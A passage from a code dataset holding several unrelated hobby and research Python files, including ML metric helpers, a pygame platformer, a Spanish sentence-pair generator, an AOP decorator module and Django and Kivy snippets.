'Balanced Accuracy': metrics.balanced_accuracy_score(y_true, top_pred),\n 'F1 Score': metrics.f1_score(y_true, top_pred),\n 'Matthews Correlation Coefficient': metrics.matthews_corrcoef(y_true, top_pred)\n }\n\n return perf\n\ndef cal_performance(result_list):\n result_min = min(result_list)\n result_max = max(result_list)\n result_mean = np.mean(result_list)\n result_var = np.var(result_list)\n result_median = np.median(result_list)\n result_std = np.std(result_list, ddof = 1)\n \n results = pd.DataFrame(columns=['value'])\n results.loc['min'] = result_min\n results.loc['max'] = result_max\n results.loc['mean'] = result_mean\n results.loc['var'] = result_var\n results.loc['median'] = result_median\n results.loc['std'] = result_std\n \n return results\n\n\n\ndef random_select_samples_group(X_sel, Y, tki, Y_tki, group_tki, group_train, feature_name):\n group_dict = {}\n select_num = 2\n \n mask = [c for c in feature_name]\n X_test = tki[mask]\n Y_test = Y_tki\n \n for index, value in enumerate(group_tki):\n if value not in group_dict.keys():\n group_dict[value] = []\n group_dict[value].append(index)\n else:\n group_dict[value].append(index)\n \n selected_tki = []\n for key in group_dict:\n slice = random.sample(group_dict[key], select_num)\n selected_tki.extend(slice)\n \n print(\"Selected sample list:\", selected_tki)\n \n tki_list = [i for i in range(len(Y_test))]\n tki_rest = list(set(tki_list).difference(set(selected_tki)))\n \n X_test_s = X_test.loc[selected_tki]\n Y_test_s = Y_test.loc[selected_tki]\n \n X_test_new = X_test.loc[tki_rest]\n Y_test_new = Y_test.loc[tki_rest]\n \n X_sel.columns = feature_name\n \n # Reset the group information\n group_tki_select = group_tki.loc[selected_tki]\n group_tki_new = ['Abl' for i in group_tki_select]\n group_tki_new = pd.Series(group_tki_new)\n \n X_train = pd.concat([X_sel, X_test_s], axis=0, ignore_index=True)\n Y_train = pd.concat([Y, Y_test_s], axis=0, ignore_index=True)\n Group = pd.concat([group_train, group_tki_new], axis=0, ignore_index=True)\n \n pTest = deepcopy(tki.loc[tki_rest][['PDB_ID', 'MUTATION','DDG.EXP']]).reset_index()\n \n return X_train, Y_train, X_test_new, Y_test_new, pTest, Group\n\n\ndef random_select_samples(X_sel, Y, tki, Y_tki, group_tki, feature_name):\n group_dict = {}\n select_num = 2\n mask = [c for c in feature_name]\n X_test = tki[mask]\n Y_test = Y_tki\n \n for index, value in enumerate(group_tki):\n if value not in group_dict.keys():\n group_dict[value] = []\n group_dict[value].append(index)\n else:\n group_dict[value].append(index)\n \n selected_tki = []\n for key in group_dict:\n slice = random.sample(group_dict[key], select_num)\n selected_tki.extend(slice)\n \n print(\"Selected sample list:\", selected_tki)\n \n tki_list = [i for i in range(len(Y_test))]\n tki_rest = list(set(tki_list).difference(set(selected_tki)))\n \n X_test_s = X_test.loc[selected_tki]\n Y_test_s = Y_test.loc[selected_tki]\n \n X_test_new = X_test.loc[tki_rest]\n Y_test_new = Y_test.loc[tki_rest]\n \n X_sel.columns = feature_name\n \n X_train = pd.concat([X_sel, X_test_s], axis=0, ignore_index=True)\n Y_train = pd.concat([Y, Y_test_s], axis=0, ignore_index=True)\n \n pTest = deepcopy(tki.loc[tki_rest][['PDB_ID', 'MUTATION','DDG.EXP']]).reset_index()\n \n return X_train, Y_train, X_test_new, Y_test_new, pTest","repo_name":"yangziyi1990/SPLDExtraTrees","sub_path":"Code/measure_function.py","file_name":"measure_function.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"28205627083","text":"def facto(no):\r\n if no==0:\r\n return 1\r\n a= no* facto(no-1)\r\n return a\r\n\r\ndef main():\r\n value=int(input(\"Enter value to get factorial: \"))\r\n ret=facto(value)\r\n print(\"factorial of {} is {}\".format(value,ret))\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ashish-junghare/Python","sub_path":"Assignment7_5.py","file_name":"Assignment7_5.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70295513991","text":"from collections import Counter\nfrom typing import List\n\ndef leastInterval(tasks: List[str], n: int) -> int:\n num_cycles = 0\n tasks = [c for c in Counter(tasks).values()]\n while tasks:\n tasks = sorted(tasks, reverse=True)\n add = 0\n for i in range(n+1):\n if i < len(tasks):\n tasks[i] = tasks[i] - 1\n if tasks[i] < 1:\n del tasks[i]\n add = add + 1\n elif not tasks:\n break\n else:\n add = add + 1\n num_cycles = num_cycles + add\n \n return num_cycles\n\nprint(leastInterval([\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"], 2))","repo_name":"branislav1991/Algorithms","sub_path":"least_interval.py","file_name":"least_interval.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73687652553","text":"from e_caller import ECallerHistory\nfrom helpers import normalizeState\nimport torch\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport sys\n\nif len(sys.argv) < 2:\n\tprint(\"Needs a positive int argument\")\n\tsys.exit()\ntry:\n\tindex = int(sys.argv[1])\nexcept:\n\tprint(\"Needs a positive int argument\")\n\tsys.exit()\n\nhist = ECallerHistory.load(\"nn_again4\")\ninfos = sum(list(hist.history.values()), [])\n\nsuccesses = [info for info in infos if info['solved']]\nbig_succ = [i for i in successes if len(i['states']) > 2000]\nsucc = big_succ[index]\n\n#model_paths = sorted(glob(\"model_histories/nn_third0_train/*\"))\n#model_paths = sorted(glob(\"model_histories/nn_short_blame_low_entropy0_train/*\"))\n#model_paths = sorted(glob(\"model_histories/nn_again0_train/*\"))\nmodel_paths = sorted(glob(\"model_histories/nn_again4_train/*\"))\n\nmodels = [torch.load(model_path) for model_path in model_paths]\n\n\n\ndef getPolicies(model, state):\n\treturn [x.item() for x in torch.softmax(model(state), dim=1).reshape(-1)]\n\n# First Plot is CEF preferences for the start state of succ as it changes over \"models\"\ni = 0\n#i = 1000\nall_states = normalizeState(succ['states']).to(torch.float)\nstart_state = all_states[i].reshape(1,-1)\npolicies = [getPolicies(model, start_state) for model in models]\nprint(policies[-1])\ntime_series = list(zip(*policies))\n\nxs = list(range(len(models)))\nplt.stackplot(xs, *time_series)\nplt.xlabel(\"Policy #\")\nplt.ylabel(\"CEF selection probabilities\")\nplt.xlim(0,len(xs))\nplt.savefig(f\"figures/actor_during_training_{succ['problem']}.png\")\n\n\n# The Second Plot is CEF preferences for the ith state of succ for the final model.\nplt.figure()\n\nmodel = models[-1]\npolicies = [getPolicies(model, state.reshape(1,-1)) for state in all_states]\ntime_series = list(zip(*policies))\n\nxs = list(range(len(succ['states'])))\nplt.stackplot(xs, *time_series)\nplt.xlabel(\"Given Clause Selections\")\nplt.ylabel(\"CEF selection probabilities\")\nplt.xlim(0,2000)\nplt.savefig(f\"figures/actor_after_training_{succ['problem']}.png\")\n","repo_name":"jackeown/Reinforce_E","sub_path":"makeActorPlot.py","file_name":"makeActorPlot.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14746588691","text":"# coding: utf8\r\n\r\n__all__ = [\"aspect\", \"get_aspect\", \"is_aspect_present\",\r\n \"before\", \"get_before\", \"is_before_present\",\r\n \"around\", \"get_around\", \"is_around_present\",\r\n \"after_throwing\", \"get_after_throwing\", \"is_after_throwing_present\",\r\n \"after_returning\", \"get_after_returning\", \"is_after_returning_present\",\r\n \"after\", \"get_after\", \"is_after_present\"]\r\n__authors__ = [\"Tim Chow\"]\r\n\r\nimport inspect\r\nimport types # used by AdviceFactory, DON'T DELETE IT\r\n\r\nfrom ..reflect import get_declared_fields\r\n\r\n\r\ndef aspect(order):\r\n if not isinstance(order, int):\r\n raise ValueError(\"int expected\")\r\n\r\n def _inner(cls):\r\n if not inspect.isclass(cls):\r\n raise RuntimeError(\"class expected\")\r\n setattr(cls, \"__aop_aspect__\", order)\r\n return cls\r\n return _inner\r\n\r\n\r\ndef get_aspect(cls):\r\n if not inspect.isclass(cls):\r\n return None\r\n if \"__aop_aspect__\" not in get_declared_fields(cls, only_names=True):\r\n return None\r\n order = getattr(cls, \"__aop_aspect__\")\r\n if not isinstance(order, int):\r\n return None\r\n return order\r\n\r\n\r\ndef is_aspect_present(cls):\r\n return get_aspect(cls) is not None\r\n\r\n\r\nclass AdviceFactory(object):\r\n define_advice_type = \"{{ADVICE_TYPE_PLACEHOLDER}}\"\r\n\r\n advice = \"\"\"\\\r\ndef {{ADVICE_TYPE_PLACEHOLDER}}(point_cut):\r\n def _inner(f):\r\n if not isinstance(f, types.FunctionType):\r\n raise RuntimeError(\"function expected\")\r\n setattr(\r\n f,\r\n \"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\",\r\n point_cut)\r\n return f\r\n return _inner\r\n\"\"\"\r\n\r\n get_advice = \"\"\"\\\r\ndef get_{{ADVICE_TYPE_PLACEHOLDER}}(f):\r\n if not isinstance(f, types.MethodType):\r\n raise RuntimeError(\"method expected\")\r\n if \"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\" not in get_declared_fields(f, only_names=True):\r\n return None\r\n attr_value = getattr(\r\n f, \r\n \"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\")\r\n if not isinstance(attr_value, basestring):\r\n return None\r\n return attr_value\r\n\"\"\"\r\n\r\n is_advice_present = \"\"\"\\\r\ndef is_{{ADVICE_TYPE_PLACEHOLDER}}_present(f):\r\n return get_{{ADVICE_TYPE_PLACEHOLDER}}(f) is not None\r\n\"\"\"\r\n\r\n @classmethod\r\n def create(cls, advice_type):\r\n if advice_type not in [\"before\", \"around\",\r\n \"after_throwing\", \"after_returning\",\r\n \"after\"]:\r\n raise ValueError(\"invalid advice type\")\r\n _locals = {}\r\n exec(cls.advice.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n exec(cls.get_advice.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n exec(cls.is_advice_present.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n return (_locals[advice_type],\r\n _locals[\"get_\" + advice_type],\r\n _locals[\"is_\" + advice_type + \"_present\"])\r\n\r\n\r\nbefore, get_before, is_before_present = AdviceFactory.create(\"before\")\r\naround, get_around, is_around_present = AdviceFactory.create(\"around\")\r\nafter, get_after, is_after_present = AdviceFactory.create(\"after\")\r\nafter_throwing, get_after_throwing, \\\r\n is_after_throwing_present = AdviceFactory.create(\"after_throwing\")\r\nafter_returning, get_after_returning, \\\r\n is_after_returning_present = AdviceFactory.create(\"after_returning\")\r\n","repo_name":"tim-chow/summermvc","sub_path":"summermvc/decorator/aop.py","file_name":"aop.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4525078268","text":"from menu import MENU\napproved_commands = [\n \"espresso\",\n \"latte\",\n \"cappucio\",\n \"off\",\n \"report\"\n]\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0,\n}\n\n\ndef main():\n while True:\n user_choice = get_user_input()\n print(\"\\nYour choice is %s\" % (user_choice))\n\n if user_choice == \"off\":\n print(\"Shutting off\")\n break\n elif user_choice == \"report\":\n print_report()\n else:\n sufficientcy = check_sufficientcy(user_choice)\n if sufficientcy:\n totale_user_values = process_coins()\n check_price(user_choice, totale_user_values)\n\n\ndef get_user_input():\n user_choice = input(\"\\nWhat would you like? \\n\").lower()\n while user_choice not in approved_commands:\n user_choice = input(\n \"\\nInvalid parameter.\\nWhat would you like? \\n\").lower()\n return user_choice\n\n\ndef print_report():\n print(\n \"\"\"\n Water: %sml\n Milk: %sml\n Coffee: %sg\n Money: $%s\n \"\"\" % (resources[\"water\"], resources[\"milk\"], resources[\"coffee\"], resources[\"money\"])\n )\n\n\ndef check_sufficientcy(coffee_type):\n for ingredient in MENU[coffee_type][\"ingredients\"]:\n if MENU[coffee_type][\"ingredients\"][ingredient] <= resources[ingredient]:\n return True\n else:\n print(\"Sorry, we are out of resources\")\n return False\n\n\ndef pure_coffee(coffee_type):\n pass\n\n\ndef process_coins():\n quaters = float(input(\"Enter quaters: \"))\n dimes = float(input(\"Enter dimes: \"))\n nickels = float(input(\"Enter nickles: \"))\n pennies = float(input(\"Enter pennies: \"))\n return quaters*0.25+dimes*0.1+nickels*0.05+pennies*0.01\n\n\ndef check_price(coffee_type, value):\n if MENU[coffee_type][\"cost\"] <= value:\n resources[\"money\"] = MENU[coffee_type][\"cost\"]\n print(\"Change is %s\" % (value-MENU[coffee_type][\"cost\"]))\n for ingredient in MENU[coffee_type][\"ingredients\"]:\n resources[ingredient] = resources[ingredient] - \\\n MENU[coffee_type][\"ingredients\"][ingredient]\n print(\"Enjoy your coffee!\")\n\n return True\n else:\n print(\"Insufficient amount of money\")\n print(\"Money refunded\")\n return False\n\n\nmain()\n","repo_name":"ViktorSheverdin/coffeemachine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"351274265","text":"from Definitions import *\nclass Level:\n def __init__(self,name,dimension,level,foreground,background,endPos,startPos=(1,1,1,1)):\n self.name=name\n self.dimension=dimension\n self.size=len(level)\n self.foreground=foreground\n self.background=background\n self.endPos=endPos\n self.startPos=startPos\n self.level=level\n endPos+=[1,1]\n self.level[endPos[0],endPos[1],endPos[2],endPos[3]]=0\n def __getitem__(self,*index):\n index=index[0]\n x,y=index[:2]\n try:\n item=self.level[x,y,1,1]\n item=self.level[x,y,index[2],1]\n item=self.level[x,y,index[2],index[3]]\n except TypeError:\n pass\n return item\nclass Player:\n inMove=0\n dx=0\n dy=0\n dz=0\n dw=0\n moveTime=8\n def __init__(self,x,y,z,w):\n self.x=x\n self.y=y\n self.z=z\n self.w=w\n def move(self,level,dx=0,dy=0,dz=0,dw=0):\n self.inMove=self.moveTime\n try:\n wall=level[self.x+dx,self.y+dy,self.z+dz,self.w+dw]\n except IndexError:\n wall=0\n if wall:\n self.inMove=0\n self.dx=dx\n self.dy=dy\n self.dz=dz\n self.dw=dw\n def getIntPos(self):\n return(int(self.x),int(self.y),int(self.z),int(self.w))\n def getPos(self):\n return(self.x,self.y,self.z,self.w)\n def update(self,state):\n keys=pygame.key.get_pressed()\n if not self.inMove:\n move=None\n if keys[pygame.K_UP]or keys[pygame.K_w]:\n move=(0,-1)\n if keys[pygame.K_DOWN]or keys[pygame.K_s]:\n move=(0,1)\n if keys[pygame.K_LEFT]or keys[pygame.K_a]:\n move=(-1,0)\n if keys[pygame.K_RIGHT]or keys[pygame.K_d]:\n move=(1,0)\n if move:\n self.move(state.level,*orientPos(state.orient,(0,0,0,0),move))\n if self.inMove:\n factor=2*self.inMove/(self.moveTime**2+self.moveTime)\n self.x+=self.dx*factor\n self.y+=self.dy*factor\n self.z+=self.dz*factor\n self.w+=self.dw*factor\n self.inMove-=1\n if self.inMove==0:\n self.x=round(self.x)\n self.y=round(self.y)\n self.z=round(self.z)\n self.w=round(self.w)\n","repo_name":"DecklynKern/HyperMaze","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1172684599","text":"import pygame, gui, player, platform, particles\nfrom pygame.locals import *\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((0, 0))\n\nw, h = pygame.display.get_surface().get_size()\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(\"Arial\", 18)\n\nTilesSurface = pygame.Surface((20, 20))\n\nCamX, CamY = (0,0)\nallsprites = pygame.sprite.Group()\nallLevelsprites = pygame.sprite.Group()\ncollisions = pygame.sprite.Group()\nfakeLevel = pygame.sprite.Group()\nticks = 0\ndeltaTime = 0\nfoward = True\nfloors = []\nfakefloors = []\nDebugs = False\nparticlesArr = []\nlevel = 1\nscreentransition = False\nscreentransitionFrame = 0\n\n\ndef update_fps():\n global deltaTime, ticks\n fps = str(int(clock.get_fps()))\n if(ticks > 25):\n deltaTime = (61/(int(fps)+1))\n else:\n deltaTime = 1\n ticks += 1\n fps_text = font.render(fps, 1, pygame.Color(\"coral\"))\n TilesSurface.fill((3, 3, 3))\n TilesSurface.blit(fps_text, (0,0))\n\n return TilesSurface\n\ndef loadLevel(level):\n floors.clear()\n collisions.empty()\n allLevelsprites.empty()\n \n f = open(\"Levels/\" + str(level) +\".txt\", \"r\")\n row = []\n col = []\n linecount = 0\n rowlen = 0\n for line in f:\n if line != \"\\n\":\n linecount += 1\n row = line.split(\",\")\n for i in row:\n rowlen = len(row)\n col.append(row)\n print(col)\n print (len(col))\n for y in range(linecount):\n for x in range(rowlen):\n if(col[y][x] == \"1\" or col[y][x] == \"1\\n\"):\n floors.append(platform.Platform(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n if(col[y][x] == \"2\" or col[y][x] == \"2\\n\"):\n floors.append(platform.Spike(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n for i in floors:\n allLevelsprites.add(i)\n collisions.add(i)\n allLevelsprites.draw(screen)\n\n\ndef TestWorld():\n floor1 = platform.Platform(x=720, y =950, w=1250, h=125)\n collisions.add(floor1)\n allsprites.add(floor1)\n floor2 = platform.Platform(x=720, y =500, w=75, h=600)\n collisions.add(floor2)\n allsprites.add(floor2)\n \ndef loadFakeLevel(level):\n fakeLevel.empty() \n fakefloors.clear()\n\n f = open(\"Levels/\" + str(level) +\".txt\", \"r\")\n row = []\n col = []\n linecount = 0\n rowlen = 0\n for line in f:\n if line != \"\\n\":\n linecount += 1\n row = line.split(\",\")\n for i in row:\n rowlen = len(row)\n col.append(row)\n print(col)\n print (len(col))\n for y in range(linecount):\n for x in range(rowlen):\n if(col[y][x] == \"1\" or col[y][x] == \"1\\n\"):\n fakefloors.append(platform.Platform(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n if(col[y][x] == \"2\" or col[y][x] == \"2\\n\"):\n fakefloors.append(platform.Spike(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n for i in fakefloors:\n fakeLevel.add(i)\n\n\n\nloadLevel(1)\n#TestWorld()\n\ndef playerlogic():\n global screentransition, screentransitionFrame, CamX, level, foward\n if(screentransition and screentransitionFrame < 30):\n player.canmove = False\n if(foward): \n if(screentransitionFrame == 0):\n loadFakeLevel(level + 1)\n CamX += w/30 * deltaTime\n screentransitionFrame += 1 * deltaTime\n else:\n if(screentransitionFrame == 0):\n loadFakeLevel(level - 1)\n CamX -= w/30 * deltaTime\n screentransitionFrame += 1 * deltaTime\n\n\n elif(screentransitionFrame >= 30):\n\n if(foward):\n level += 1\n player.x = 25\n else:\n level -=1\n player.x = w - 25\n player.canmove = True\n screentransitionFrame = 0\n screentransition = False\n loadLevel(level)\n fakeLevel.empty()\n CamX=0\n print(\"yes!\")\n if(player.x > w - 1):\n foward = True\n screentransition = True\n if(player.x < 1 ):\n foward = False\n screentransition = True\n\n\ndef renders():\n\n playerlogic()\n allsprites.update(CamX, CamY, collisions, deltaTime)\n allsprites.draw(screen)\n allLevelsprites.draw(screen)\n allLevelsprites.update(CamX, CamY, collisions, deltaTime)\n if(foward):\n fakeLevel.update(CamX - w, 0, collisions, deltaTime)\n else:\n fakeLevel.update(CamX + w, 0, collisions, deltaTime) \n fakeLevel.draw(screen)\n \n pos = 0\n for par in particlesArr:\n pos+=1\n screen.blit(par.update(deltaTime), (par.x, par.y))\n if(par.frame > par.lifetime):\n particlesArr.pop(pos-1)\n\n\nplayer = player.Player(x= 90, y= 255 , screen=screen)\nallsprites.add(player)\n\n\n\n\ndef Debug():\n if(player.isground):\n pygame.draw.rect(screen, (255,255,255) , player.rectBottom, 3)\n else: \n pygame.draw.rect(screen, (255,0,0) , player.rectBottom, 3)\n if(player.LeftWall):\n pygame.draw.rect(screen, (255,255,255) , player.rectLeft, 3)\n else:\n pygame.draw.rect(screen, (255,255,0) , player.rectLeft, 3)\n if(player.RightWall):\n pygame.draw.rect(screen, (255,255,255) , player.rectRight, 3)\n else:\n pygame.draw.rect(screen, (255,0,255) , player.rectRight, 3)\n pygame.draw.rect(screen, (0,255,255) , player.rectTop, 3)\n for i in collisions:\n pygame.draw.rect(screen, (0,255,0) , i.rect, 3)\n\n\nloop = 1\nwhile loop:\n \n clock.tick(60)\n screen.fill((237, 180, 235))\n\n pressed_keys = pygame.event.get()\n for event in pressed_keys:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n loop = 0 \n if event.key == pygame.K_F1:\n if Debugs:\n Debugs = False\n else:\n Debugs = True\n if event.type == pygame.QUIT:\n loop = 0\n renders()\n \n screen.blit(update_fps(), (10,screen.get_height() * 0.97))\n if(Debugs == True):\n Debug()\n pygame.display.update()","repo_name":"Conker923four/squares","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"41925038755","text":"from Spanish_Utils.randomize import choice\nfrom Spanish_Utils.vocab_sets import *\nfrom Spanish_Utils.string_utils import *\nimport sys\n\n#preposiciones: after, through, before, while, without\npreps = ['antes de','después de','mientras', 'sin']\n#could_should = ['podría','podrían','debería','deberían']\n\n#all_animate_pl_nouns_f, ...\n#d_fem_pl, ...\n#all_p3is_anim_subj_allowing_verbs\n\n#FOR QUIEN --> all_anim_anim_verbs_3is(p)_pst\n\n # What did John read before filing the book?\n # que leyo juan antes de ?? el libro?\n # que_quien[0] vbpastpret_anim_to_inanim preps vb_tr det noun\n # Wh Aux_mat Subj V_mat ADV V_emb Obj\n # What did John read the book before filing?\n # Wh Aux_mat Subj V_mat Obj ADV V_emb\n\n\ndef sample(iter,out):\n for i in range(iter):\n prep = choice(preps)\n V2 = verb_cleanup(choice(all_non_finite_transitive_verbs),remove_se_inf = True)\n #quien, needs non-anim to anim verb\n if np.random.choice([True,False]):\n #plural agent and anim anim verb\n q = que_quien[1]\n V1 = choice(all_anim_anim_verbs_3ip_pst)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_pl)\n ag = choice(n_fem_pl)\n else:\n #masc pl\n ag_det = choice(d_masc_pl)\n ag = choice(n_masc_pl)\n elif np.random.choice([True,False]):\n #singular agent anim anim verb\n q = que_quien[1]\n V1 = choice(all_anim_anim_verbs_3is_pst)\n if np.random.choice([True,False]):\n #fem sg\n ag_det = choice(d_fem_sg)\n ag = choice(n_fem_sg,all_proper_nouns)\n else:\n #masc sg\n ag_det = choice(d_masc_sg)\n ag = choice(n_masc_sg, all_proper_nouns)\n elif np.random.choice([True,False]):\n #plural agent non anim verb\n q = que_quien[0]\n V1 = choice(past_pret_3p)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_pl)\n ag = choice(n_fem_pl)\n else:\n #masc pl\n ag_det = choice(d_masc_pl)\n ag = choice(n_masc_pl)\n else:\n #sg agent non anim verb\n q = que_quien[0]\n V1 = choice(past_pret_3s)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_sg)\n ag = choice(n_fem_sg, all_proper_nouns)\n else:\n #masc pl\n ag_det = choice(d_masc_sg)\n ag = choice(n_masc_sg,all_proper_nouns)\n #make pl/sg choice for obj\n if np.random.choice([True,False]):\n #plural object\n if np.random.choice([True,False]):\n #fem pl\n obj_det = choice(d_fem_pl)\n obj = choice(n_fem_pl)\n else:\n #masc pl\n obj_det = choice(d_masc_pl)\n obj = choice(n_masc_pl)\n else:\n #singular objeCT\n if np.random.choice([True,False]):\n #fem sg\n obj_det = choice(d_fem_sg)\n obj = choice(n_fem_sg,all_proper_nouns)\n else:\n #masc sg\n obj_det = choice(d_masc_sg)\n obj = choice(n_masc_sg, all_proper_nouns)\n \n data = {\n 'sentence_good':string_beautify('%s %s %s %s %s %s %s %s' % (q,V1,ag_det,ag,prep,V2,obj_det,obj), question = True),\n 'sentence_bad':string_beautify('%s %s %s %s %s %s %s %s' % (q,V1,ag_det,ag,obj_det,obj,prep,V2), question = True)\n }\n out.write(str(data)+'\\n')\ntry:\n iter = int(sys.argv[1])\n out = open(sys.argv[2],'w')\n sample(iter,out)\nexcept IndexError:\n print('To run this file use:\\npython adjunct_island.py <# of sentences> ')\n sys.exit()\n\n","repo_name":"MikeinBoulder/data_generation","sub_path":"Spanish_Benchmark/Spanish_Categories/island_effects/adjunct_island.py","file_name":"adjunct_island.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32422255801","text":"class Solution:\n def scoreOfParentheses(self, S: str) -> int:\n stack = []\n for x in S:\n if x == '(':\n stack.append(x)\n else:\n if stack[-1] == '(':\n stack.pop()\n if stack and not stack[-1] == '(':\n stack[-1] += 1\n else:\n stack.append(1)\n else:\n v, _ = stack.pop(), stack.pop()\n if stack and not stack[-1] == '(':\n stack[-1] += v * 2\n else:\n stack.append(v * 2)\n return stack[0]\n\nclass Solution:\n def scoreOfParentheses(self, S: str) -> int:\n ans = bal = 0\n for i, x in enumerate(S):\n if x == '(':\n bal += 1\n else:\n bal -= 1\n if S[i - 1] == '(':\n ans += 1 << bal\n return ans\n\nif __name__ == '__main__':\n solver = Solution()\n cases = [\n \"()\",\n \"()()\",\n \"(())\",\n \"()(())\",\n \"(()(()))\"\n ]\n rslts = [solver.scoreOfParentheses(S) for S in cases]\n for cs, rs in zip(cases, rslts):\n print(f\"case: {cs} | solution: {rs}\")\n","repo_name":"gyang274/leetcode","sub_path":"src/0800-0899/0856.parentheses.score.py","file_name":"0856.parentheses.score.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34990501019","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import widgets\n\nfrom webapp.models import Ad, Comment\n\n\nclass AdForm(forms.ModelForm):\n class Meta:\n model = Ad\n fields = ['photo', 'title', 'description', 'category', 'price']\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'description': forms.Textarea(attrs={'class': 'form-control'}),\n }\n error_messages = {\n 'content': {\n 'required': 'Поле должно быть заполнено'\n }\n }\n\n\nclass SimpleSearchForm(forms.Form):\n search = forms.CharField(max_length=50, required=False, label='Найти', widget=widgets.TextInput(attrs={'class': \"form-control w-25\"}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['text']","repo_name":"Bandeguras/exam_9","sub_path":"source/webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42636086456","text":"# -*- coding: utf-8 -*-\n# Author: Tamas Marton\n\nimport sys\nimport time\nimport kivy\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.logger import Logger\nfrom kivy.properties import ObjectProperty, ListProperty\nfrom kivy.app import App\n\nfrom kivy.uix.screenmanager import ScreenManager, Screen, SlideTransition\n\n\nfrom kivy.adapters.dictadapter import DictAdapter\nfrom kivy.adapters.simplelistadapter import SimpleListAdapter\nfrom kivy.uix.listview import ListItemButton, ListItemLabel, CompositeListItem, ListView\n\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\n\n'''Fixing OSX Mavericks stupid locale bug'''\nimport platform\nif platform.system() == \"Darwin\":\n\timport locale\n\tlc = locale.getlocale()\n\tif lc[0]== None and lc[1]== None:\n\t\tlocale.setlocale(locale.LC_ALL, 'en_US')\n\n\nclass TasksScreen(Screen):\n\tpass\n\nclass ExecutingScreen(Screen):\n\tpass\n\nclass NoTaskSelectedDialog(Popup):\n\tpass\n\nclass MyButton(Button):\n\tpass\n\n\nclass GUI(BoxLayout):\n\n\ttext_ipToConnect = ObjectProperty(None)\n\tlabel_Connected = ObjectProperty(None)\n\ttabbed_Panel = ObjectProperty(None)\n\tpanelHeader_Connect = ObjectProperty(None)\n\tpanelHeader_Tasks = ObjectProperty(None)\n\tpanelHeader_Results = ObjectProperty(None)\n\n\tdef __init__(self, **kwargs):\n\t\tsuper(GUI,self).__init__(**kwargs)\n\t\tLogger.info('GUI: Main GUI created')\n\n\t\tself.screenManager.transition = SlideTransition(direction=\"left\")\n\n\t\tself.listOfTask = self.taskToBeExecute\n\t\tself.controller = App.get_running_app()\n\n\n\tdef getAdapter(self):\n\t\ttask_args_converter = lambda row_index, rec: {\n\t\t\t'orientation': 'vertical',\n\t\t\t'text': rec['name'],\n\t\t\t'size_hint_y': None,\n\t\t\t'height': '150sp',\n\t\t\t'spacing': 0,\n\t\t\t'cls_dicts': [{'cls': ListItemButton,\n\t\t\t\t\t\t 'kwargs':{'text': rec['name'],\n\t\t\t\t\t\t \t\t\t 'is_representing_cls': True, 'size_hint_y': 0.2, 'markup': True, 'deselected_color':[1., 1., 0., 1], 'selected_color':[0., 1., 0., 1]}},\n\t\t\t\t\t\t\t{'cls': ListItemLabel,\n\t\t\t\t\t\t\t 'kwargs':{'text': rec['desc'], 